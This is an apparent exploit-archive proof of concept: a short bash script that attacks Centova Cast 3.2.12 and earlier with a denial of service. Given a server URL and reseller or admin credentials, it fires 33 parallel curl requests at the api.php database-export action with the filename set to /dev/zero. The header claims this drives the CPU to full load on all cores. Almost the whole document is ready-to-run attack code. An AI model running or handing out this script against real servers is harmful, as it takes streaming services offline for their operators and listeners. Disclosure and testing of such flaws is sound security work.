# Exploit Title: Centova Cast 3.2.12 - Denial of Service (PoC) # Date: 2019-11-18 # Exploit Author: DroidU # Vendor Homepage: https://centova.com # Affected Version: <=v3.2.12 # Tested on: Debian 9, CentOS 7 # =============================================== # The Centova Cast becomes out of control and causes 100% CPU load on all cores. #!/bin/bash if [ "$3" = "" ] then echo "Usage: $0 centovacast_url reseller/admin password" exit fi url=$1 reseller=$2 pass=$3 dwn() { echo -n . curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero" & } for i in {0..32} do dwn /dev/zero sleep .1 done echo " Done!"